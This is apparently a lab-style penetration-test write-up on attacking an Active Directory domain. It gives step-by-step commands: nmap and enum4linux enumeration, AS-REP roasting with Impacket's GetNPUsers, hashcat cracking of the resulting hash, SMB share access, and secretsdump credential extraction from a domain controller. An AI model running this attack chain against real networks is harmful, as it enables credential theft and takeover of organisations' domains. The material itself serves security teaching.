Decrypting Defenses: Basic Techniques to Penetrate Active Directory Systems
Introduction
In this exploration, I aim to demonstrate a basic penetration test against a Active Directory (AD) setup, showcasing how even robust systems can exhibit exploitable vulnerabilities. The journey starts with initial reconnaissance using nmap, a cornerstone tool in network scanning, progressing through more sophisticated tools and tactics. Let’s delve into the details of each tool and its role in unveiling system weaknesses.
Step 1: Initial Network Scanning with Nmap
Tool Used: Nmap (Network Mapper)
Nmap is a powerful network scanning tool that provides comprehensive information about network environments, including open ports, services, and, crucially for this exercise, details about networked systems such as the AD domain name.
Command:
nmap -sV -p 139,445 target_IP
-sV: Probe open ports to determine service/version info.-p 139,445: Specifically scan SMB ports which are critical in AD environments.
Key Outcomes:
- Identified the AD domain name “MYSTIC-AD,” crucial for subsequent targeted attacks.
- Verified open SMB ports (139 and 445), confirming potential entry points for exploitation.
Step 2: Enumerating SMB with Enum4Linux
Following the network mapping, enum4linux was used to perform a deeper enumeration of SMB services, targeting specific vulnerabilities related to Windows networking and Active Directory services.
Tool Used: Enum4Linux
Command:
enum4linux -a target_IP
-a: Automates all basic enumeration functions to gather extensive details about users, groups, and more.
Significant Findings:
- Detailed listings of user accounts and SMB shares, notably identifying
svc-eliteandbackup-proaccounts.
Step 3: Exploiting Kerberos with ASREPRoasting
Kerberos, the default authentication service for Windows domains, was targeted next. Misconfigurations here, such as disabled pre-authentication, can lead to vulnerabilities such as ASREPRoasting.
Tool Used: GetNPUsers from Impacket Suite
Command:
GetNPUsers.py -no-pass -dc-ip target_IP domain/svc-elite
-no-pass: Attempts to retrieve the TGT for accounts configured without pre-authentication.
Outcome:
- Successfully extracted the TGT for
svc-elite, which provided a hash to be cracked.
Step 4: Cracking Hashes with Hashcat
Upon obtaining the Kerberos hash, hashcat was employed to decrypt the hash, potentially revealing the user’s password.
Tool Used: Hashcat
Command:
hashcat -m 18200 -a 0 hash.txt wordlist.txt
-m 18200: Specifies the mode for Kerberos 5 TGT-REP etype 23 hashes.-a 0: Straight attack mode using a predefined wordlist.
Cracked Password:
- “Vanguard123”, highlighting the need for stronger password policies.
Step 5: Accessing SMB Shares with Smbclient
With valid credentials in hand, smbclient was utilized to explore and manipulate SMB shares directly, searching for sensitive information or further network access points.
Tool Used: Smbclient
Command:
smbclient -L \\target_IP\ -U svc-elite
-L: List available shares on the target machine.-U: Use the cracked credentials to authenticate.
Key Discovery:
- Accessed critical files within the
backup-proshare, potentially leading to further network compromise.
Step 6: Full Domain Control with Secretsdump.py
Achieving full domain control was the final goal, accomplished by dumping critical data from the domain controller using secretsdump.py.
Tool Used: Secretsdump.py from Impacket Suite
Command:
secretsdump.py -just-dc-user admin target_IP
-just-dc-user: Targets a specific domain controller account for credential extraction.
Conclusion
This exercise illustrated how various tools can be systematically used to expose and exploit vulnerabilities in a hardened AD environment. Each tool brought us closer to understanding the security posture and necessary defenses required to protect such critical systems.
Mayank Nauni, Cybersecurity Researcher
Join the discussion on effective strategies for securing AD environments. Reach out with your insights or queries, and let’s enhance our collective cybersecurity knowledge together!
Recent Comments